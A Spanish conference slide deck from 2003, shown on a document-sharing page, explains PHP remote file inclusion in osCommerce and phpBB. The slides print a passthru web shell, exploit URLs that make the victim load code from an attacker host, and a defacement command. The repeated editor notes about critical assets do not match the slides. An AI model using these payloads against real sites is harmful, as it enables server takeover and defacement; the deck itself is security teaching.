Conferencias FIST, profile picture
Subido porConferencias FIST
PPT, PDF430 vistas

Exploiting Web Applications PHP

Este documento describe una vulnerabilidad de inserción de PHP que afecta a productos como osCommerce, phpBB y ZeroBoard. La vulnerabilidad permite a un atacante incluir y ejecutar archivos PHP arbitrarios en un sitio web vulnerable mediante la manipulación de parámetros de inclusión. Esto podría permitir al atacante ejecutar comandos de shell en el servidor de la víctima. El documento explica cómo explotar esta vulnerabilidad contra sitios osCommerce y phpBB.

Incrustar presentación

Descargado 11 veces
FIST Conference October 2003 @ Inserción PHP © Rafael San Miguel Carrasco
Inserción PHP Requisitos:  allow_url_fopen y register_globals activadas en php.ini  Se utiliza include () en el código PHP © Rafael San Miguel Carrasco, rsmc@soluciones-seguras.com 2
Inserción PHP Productos afectados:  osCommerce (solución e-commerce)  phpBB (BBS basada en web)  ZeroBoard (gestor de boards) © Rafael San Miguel Carrasco, rsmc@soluciones-seguras.com 3
Inserción PHP En OsCommerce, include_once.php: <? if (!defined($include_file . '__')) { define($include_file . '__', 1); include($include_file); } ?> Se usa frecuentemente: <body marginwidth="0" marginheight="0" topmargin="0" bottommargin="0" leftmargin="0" rightmargin="0" bgcolor="#FFFFFF"> <!-- header //--><? $include_file = DIR_WS_INCLUDES . 'header.php'; include(DIR_WS_INCLUDES . 'include_once.php'); ?><!-- header_eof //--> © Rafael San Miguel Carrasco, rsmc@soluciones-seguras.com 4
Inserción PHP En mi servidor web, shell.php:  <? passthru ("<comando>") ?> Finalmente: http://servidor_vulnerable/catalog/inludes/include_once.php? include_file=http://atacante/shell.php Se inserta e interpreta shell.php en el servidor víctima. © Rafael San Miguel Carrasco, rsmc@soluciones-seguras.com 5
Inserción PHP En phpBB: include($phpbb_root_dir . 'includes/functions_selects.‘ .$phpEx); En mi servidor, includes/functions_selects.php: http://servidor_vulnerable/install.php?phpbb_root_dir= http://atacante/ © Rafael San Miguel Carrasco, rsmc@soluciones-seguras.com 6
Inserción PHP Ésta es la página principal: © Rafael San Miguel Carrasco, rsmc@soluciones-seguras.com 7
Inserción PHP Usamos include_once.php y shell.php: <? passthru ("echo defaced_web! > indice.html"); ?> A continuación: http://10.0.1.1/include_once.php? include_file=http://10.0.1.2/shell.php © Rafael San Miguel Carrasco, rsmc@soluciones-seguras.com 8
© Rafael San Miguel Carrasco, rsmc@soluciones-seguras.com 9
Inserción PHP FIST Conference October 2003 © Rafael San Miguel Carrasco Madrid, 25 October 2003

Más contenido relacionado

PPTX
Curso php dia6
porcognos_uie
 
PDF
Desarrollo de sistios web
poresmartcrimt
 
DOCX
Instalar php en debian
porDaniel Zavala
 
PDF
Curso desarrollo web_con_php_y_my_sql
porwilliam kozisck
 
PDF
Tutorial de php y my sql completo
porAndrés Amaya
 
PPTX
Os commerce
porbryansoria89
 
PDF
PHP Tema 7 - Seguridad
porSpacetoshare
 
PPTX
Os commerce
porJonathan Medina Cy
 
Curso php dia6
porcognos_uie
 
Desarrollo de sistios web
poresmartcrimt
 
Instalar php en debian
porDaniel Zavala
 
Curso desarrollo web_con_php_y_my_sql
porwilliam kozisck
 
Tutorial de php y my sql completo
porAndrés Amaya
 
Os commerce
porbryansoria89
 
PHP Tema 7 - Seguridad
porSpacetoshare
 
Os commerce
porJonathan Medina Cy
 

La actualidad más candente

PDF
php
pornfjs001
 
PDF
Server apache2+php5+mysql+phpmyadmin oscar cortez
porOscar Martin Cortez Martinez
 
PPTX
Oscommerce rogerespin
porRoger Espin
 
DOCX
Instalacion del Joomla 1.5
porlagreda76
 
PDF
LAM with python
porinfotejero
 
PDF
Instalación y configuración Mysql Xampp
porJuan Astudillo
 
PPTX
Tutorial para instalar apache + php + my sql
pordanalizcano
 
ODP
Desplegando Proyectos Symfony2 con Capistrano-Capifony y Git
pormoisesgallego
 
PDF
Manual php y_mysql
porjohan reyes
 
PDF
Oscommerce
porepga
 
PDF
Tutorial de instalación de apache, php, mysql y phpmyadmin
porIgnacio Aular Reyes
 
PPT
Proyecto H3m Unisiga2 Proceso Instalacion 5 De 5
porFranklin Calle Zapata
 
PPTX
xammp
porAlex
 
PDF
Generalidades php
porDenisseChacaguasay
 
PPTX
Oscommerce final
porJorge Aguayo
 
DOCX
Php apéndice
porviruscraquer
 
PDF
Guia basica-securizacion-apache
porERWIN AGUILAR
 
php
pornfjs001
 
Server apache2+php5+mysql+phpmyadmin oscar cortez
porOscar Martin Cortez Martinez
 
Oscommerce rogerespin
porRoger Espin
 
Instalacion del Joomla 1.5
porlagreda76
 
LAM with python
porinfotejero
 
Instalación y configuración Mysql Xampp
porJuan Astudillo
 
Tutorial para instalar apache + php + my sql
pordanalizcano
 
Desplegando Proyectos Symfony2 con Capistrano-Capifony y Git
pormoisesgallego
 
Manual php y_mysql
porjohan reyes
 
Oscommerce
porepga
 
Tutorial de instalación de apache, php, mysql y phpmyadmin
porIgnacio Aular Reyes
 
Proyecto H3m Unisiga2 Proceso Instalacion 5 De 5
porFranklin Calle Zapata
 
xammp
porAlex
 
Generalidades php
porDenisseChacaguasay
 
Oscommerce final
porJorge Aguayo
 
Php apéndice
porviruscraquer
 
Guia basica-securizacion-apache
porERWIN AGUILAR
 

Destacado

PDF
Analisis Forense Memoria RAM
porConferencias FIST
 
PDF
Ataques Mediante Memorias USB
porConferencias FIST
 
PPT
Antivirus Gateways Architecture Design
porConferencias FIST
 
PPT
Durabilidad
porConferencias FIST
 
PPT
Beyond Awareness
porConferencias FIST
 
PDF
Business Outsourcing to Asia
porConferencias FIST
 
PPT
Integrity and Security in Filesystems
porConferencias FIST
 
PPT
Security Metrics
porConferencias FIST
 
PPTX
Assessment presentation
porSpeech2023
 
PDF
Network Access Protection
porConferencias FIST
 
PDF
Analisis de Riesgos O-ISM3
porConferencias FIST
 
PDF
Using IPS for Web Protection
porConferencias FIST
 
PDF
Oissg
porConferencias FIST
 
PPT
Seguridad Windows Server 2008
porConferencias FIST
 
PPT
Exploiting Layer 2
porConferencias FIST
 
PDF
IDS with Artificial Intelligence
porConferencias FIST
 
Analisis Forense Memoria RAM
porConferencias FIST
 
Ataques Mediante Memorias USB
porConferencias FIST
 
Antivirus Gateways Architecture Design
porConferencias FIST
 
Durabilidad
porConferencias FIST
 
Beyond Awareness
porConferencias FIST
 
Business Outsourcing to Asia
porConferencias FIST
 
Integrity and Security in Filesystems
porConferencias FIST
 
Security Metrics
porConferencias FIST
 
Assessment presentation
porSpeech2023
 
Network Access Protection
porConferencias FIST
 
Analisis de Riesgos O-ISM3
porConferencias FIST
 
Using IPS for Web Protection
porConferencias FIST
 
Oissg
porConferencias FIST
 
Seguridad Windows Server 2008
porConferencias FIST
 
Exploiting Layer 2
porConferencias FIST
 
IDS with Artificial Intelligence
porConferencias FIST
 

Similar a Exploiting Web Applications PHP

PPT
Seminario Seguridad con PHP
porNazareno Lorenzo
 
ODT
LFI & RFI
pormagnobalt
 
PDF
Presentacion_PHP5_Avanzado.pdf
porLorenzo Santos Virosta
 
DOCX
Tutorial php basico
porYo ♥ Tacna
 
PPT
Seguridad en el Desarrollo de Aplicaciones Web PHP
por7th_Sign
 
ODP
[Flisol2011] Seguridad en el Desarrollo de Aplicaciones Web PHP
por7th_Sign
 
PPT
Introduccion al PHP para principiantes y estudiantes
porJessRobertoZrateDeMu
 
PDF
PHP.pdf PHP.pdf PHP.pdf PHP.pdf PHP.pdf PHP.pdf
porRaaulroodriguez
 
PPT
mejorando con php
porErvin Santos Romero
 
ODP
Introducción a PHP5
porOpen University, KMi
 
PDF
Programacion - Php
porPROD LARD
 
PPTX
Tutorial de cómo crear una pagina web
porSamuel Reyes
 
PDF
Php
porItiel Hdz Anaya
 
PDF
54 Php. La Opcion Include
porJosé M. Padilla
 
PPT
Conociendo PHP
porAntonio Kobashikawa Carrasco
 
PPTX
Php tema 4
porOrlando Amaurys Rodríguez Ramírez
 
PDF
Webinar - Radiografía actual del lenguaje PHP
porArsys
 
PDF
33 php
porJose Garcia
 
PDF
Manual De Php
porJohn Marquez O
 
PPTX
Programación Server-Side - Intro PHP.pptx
pornoctrowoficial
 
Seminario Seguridad con PHP
porNazareno Lorenzo
 
LFI & RFI
pormagnobalt
 
Presentacion_PHP5_Avanzado.pdf
porLorenzo Santos Virosta
 
Tutorial php basico
porYo ♥ Tacna
 
Seguridad en el Desarrollo de Aplicaciones Web PHP
por7th_Sign
 
[Flisol2011] Seguridad en el Desarrollo de Aplicaciones Web PHP
por7th_Sign
 
Introduccion al PHP para principiantes y estudiantes
porJessRobertoZrateDeMu
 
PHP.pdf PHP.pdf PHP.pdf PHP.pdf PHP.pdf PHP.pdf
porRaaulroodriguez
 
mejorando con php
porErvin Santos Romero
 
Introducción a PHP5
porOpen University, KMi
 
Programacion - Php
porPROD LARD
 
Tutorial de cómo crear una pagina web
porSamuel Reyes
 
Php
porItiel Hdz Anaya
 
54 Php. La Opcion Include
porJosé M. Padilla
 
Conociendo PHP
porAntonio Kobashikawa Carrasco
 
Php tema 4
porOrlando Amaurys Rodríguez Ramírez
 
Webinar - Radiografía actual del lenguaje PHP
porArsys
 
33 php
porJose Garcia
 
Manual De Php
porJohn Marquez O
 
Programación Server-Side - Intro PHP.pptx
pornoctrowoficial
 

Más de Conferencias FIST

PDF
Seguridad en Open Solaris
porConferencias FIST
 
PDF
Seguridad en Entornos Web Open Source
porConferencias FIST
 
PDF
Spanish Honeynet Project
porConferencias FIST
 
PDF
Seguridad en Windows Mobile
porConferencias FIST
 
PDF
SAP Security
porConferencias FIST
 
PDF
Que es Seguridad
porConferencias FIST
 
PDF
Las Evidencias Digitales en la Informática Forense
porConferencias FIST
 
PDF
Evolución y situación actual de la seguridad en redes WiFi
porConferencias FIST
 
PDF
El Information Security Forum
porConferencias FIST
 
PDF
Criptografia Cuántica
porConferencias FIST
 
PDF
Inseguridad en Redes Wireless
porConferencias FIST
 
PDF
Mas allá de la Concienciación
porConferencias FIST
 
PDF
Security Metrics
porConferencias FIST
 
PDF
PKI Interoperability
porConferencias FIST
 
PDF
Wifislax 3.1
porConferencias FIST
 
PDF
Network Forensics
porConferencias FIST
 
PDF
Riesgo y Vulnerabilidades en el Desarrollo
porConferencias FIST
 
PDF
Demostracion Hacking Honeypot y Análisis Forense
porConferencias FIST
 
PDF
Security Maturity Model
porConferencias FIST
 
PDF
Cisco Equipment Security
porConferencias FIST
 
Seguridad en Open Solaris
porConferencias FIST
 
Seguridad en Entornos Web Open Source
porConferencias FIST
 
Spanish Honeynet Project
porConferencias FIST
 
Seguridad en Windows Mobile
porConferencias FIST
 
SAP Security
porConferencias FIST
 
Que es Seguridad
porConferencias FIST
 
Las Evidencias Digitales en la Informática Forense
porConferencias FIST
 
Evolución y situación actual de la seguridad en redes WiFi
porConferencias FIST
 
El Information Security Forum
porConferencias FIST
 
Criptografia Cuántica
porConferencias FIST
 
Inseguridad en Redes Wireless
porConferencias FIST
 
Mas allá de la Concienciación
porConferencias FIST
 
Security Metrics
porConferencias FIST
 
PKI Interoperability
porConferencias FIST
 
Wifislax 3.1
porConferencias FIST
 
Network Forensics
porConferencias FIST
 
Riesgo y Vulnerabilidades en el Desarrollo
porConferencias FIST
 
Demostracion Hacking Honeypot y Análisis Forense
porConferencias FIST
 
Security Maturity Model
porConferencias FIST
 
Cisco Equipment Security
porConferencias FIST
 

Exploiting Web Applications PHP

  • 1.
    FIST Conference October2003 @ Inserción PHP © Rafael San Miguel Carrasco
  • 2.
    Inserción PHP Requisitos:  allow_url_fopen y register_globals activadas en php.ini  Se utiliza include () en el código PHP © Rafael San Miguel Carrasco, rsmc@soluciones-seguras.com 2
  • 3.
    Inserción PHP Productos afectados:  osCommerce (solución e-commerce)  phpBB (BBS basada en web)  ZeroBoard (gestor de boards) © Rafael San Miguel Carrasco, rsmc@soluciones-seguras.com 3
  • 4.
    Inserción PHP En OsCommerce, include_once.php: <? if (!defined($include_file . '__')) { define($include_file . '__', 1); include($include_file); } ?> Se usa frecuentemente: <body marginwidth="0" marginheight="0" topmargin="0" bottommargin="0" leftmargin="0" rightmargin="0" bgcolor="#FFFFFF"> <!-- header //--><? $include_file = DIR_WS_INCLUDES . 'header.php'; include(DIR_WS_INCLUDES . 'include_once.php'); ?><!-- header_eof //--> © Rafael San Miguel Carrasco, rsmc@soluciones-seguras.com 4
  • 5.
    Inserción PHP En mi servidor web, shell.php:  <? passthru ("<comando>") ?> Finalmente: http://servidor_vulnerable/catalog/inludes/include_once.php? include_file=http://atacante/shell.php Se inserta e interpreta shell.php en el servidor víctima. © Rafael San Miguel Carrasco, rsmc@soluciones-seguras.com 5
  • 6.
    Inserción PHP En phpBB: include($phpbb_root_dir . 'includes/functions_selects.‘ .$phpEx); En mi servidor, includes/functions_selects.php: http://servidor_vulnerable/install.php?phpbb_root_dir= http://atacante/ © Rafael San Miguel Carrasco, rsmc@soluciones-seguras.com 6
  • 7.
    Inserción PHP Ésta es la página principal: © Rafael San Miguel Carrasco, rsmc@soluciones-seguras.com 7
  • 8.
    Inserción PHP Usamos include_once.php y shell.php: <? passthru ("echo defaced_web! > indice.html"); ?> A continuación: http://10.0.1.1/include_once.php? include_file=http://10.0.1.2/shell.php © Rafael San Miguel Carrasco, rsmc@soluciones-seguras.com 8
  • 9.
    © Rafael SanMiguel Carrasco, rsmc@soluciones-seguras.com 9
  • 10.
    Inserción PHP FIST ConferenceOctober 2003 © Rafael San Miguel Carrasco Madrid, 25 October 2003

Notas del editor

  • #3 Para la mayor parte de las organizaciones los activos se dividen entre críticos y no críticos.
  • #4 Para la mayor parte de las organizaciones los activos se dividen entre críticos y no críticos.
  • #5 Para la mayor parte de las organizaciones los activos se dividen entre críticos y no críticos.
  • #6 Para la mayor parte de las organizaciones los activos se dividen entre críticos y no críticos.
  • #7 Para la mayor parte de las organizaciones los activos se dividen entre críticos y no críticos.
  • #8 Para la mayor parte de las organizaciones los activos se dividen entre críticos y no críticos.